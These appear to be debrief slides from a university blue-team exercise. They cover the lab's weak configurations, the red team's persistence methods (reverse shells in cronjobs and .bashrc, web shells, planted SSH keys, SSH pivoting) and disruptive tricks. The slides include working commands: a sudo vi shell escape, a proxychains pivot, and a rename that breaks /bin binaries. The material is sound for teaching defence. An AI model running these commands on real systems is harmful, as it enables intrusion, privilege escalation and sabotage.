Spring 2025
CSE 613

Blue Team Exercise Debriefing

bg right:50%

TOC

1. Vulnerabilities (and Patches)

2. Persistence

3. Kicking

  • Easier for us to stay in than get in
  • Hope you had an nice Easter Weekend!

Vulnerabilities

bg right:40%

Router Configuration:

  • Bad config
    • 10222 -> ssh straight to webserver
    • 21 -> ftp vulnerabilities to metasploitable box
  • Default vyos and root
  • SSH enabled
    • Password authentication allowed
    • Allowed path to metasploitable box (unused)

Webserver Configuration

  • Default passwords:
    • root, netsec, sysfs
  • Cronjob on root
    • creates backdoor sysfs account at 3am
  • SSH enabled
    • Password authentication enabled

Zencart

  • Generally safe but a few caveats
  • phpmyadmin is enabled
    • allows login w/ root user:password
    • gives access to tables (renaming, dropping)

Persistence

bg

Reverse Shells

  • reaches out to our machine to establish connection
  • cronjobs
  • .bashrc
  • Remedy:
    • find through ps -aux
    • trickier but .bashrc can replace command usage (or add to them) -> need to find

Web Shell

  • malicious .php file that gives us access to command lines
    • just need to delete the files

User Accounts

  • Added ssh keys to root/vyos/netsec accounts
  • Re-changed passwords if you did.

SSH Portforwarding

  • given access to router, can forward traffic to webserver/internal
  • need to disable ssh on both machines
ssh -D 9050 user@router
proxychains ssh user@webserver

Privilege Escalation

  • lot of users can use sudo -i
    • remove from sudo user group
  • https://gtfobins.github.io/
    • i.e. sudo vi -c ':!/bin/sh' /dev/null
    • sudo -l(ist)
  • /bin/* command privleges
    • set to rwsrwxrwx -> runs as root

Kicking

bg

Simple Stuff

  • defacing index.php
    • cronjob
    • manual
  • vyos config changes
  • renaming mysql tables through phpmyadmin

Mean Stuff

  • DOS attacks
  • rename 's/^/pwned_/ /bin/*
    • or other commands, like cat -> nyancat or an ascii cat
    • rename 's/pwned_// /bin/*
  • .bashrc replacements
    • PROMPT_COMMAND executes commands after every input to terminal
    • used to display user@machine:directory, but can clear and more.

do you want to make people miserable?

  • Happens every year! Ask Lauf to volunteer!
  • Cyber Defense in ACM Discord
  • Luke is happy to answer any questions on his methods (ludicro @ Discord)
    • hit teams 1/2/3
  • I’m also free (sclstice @ Discord)
    • hit teams 5/6/7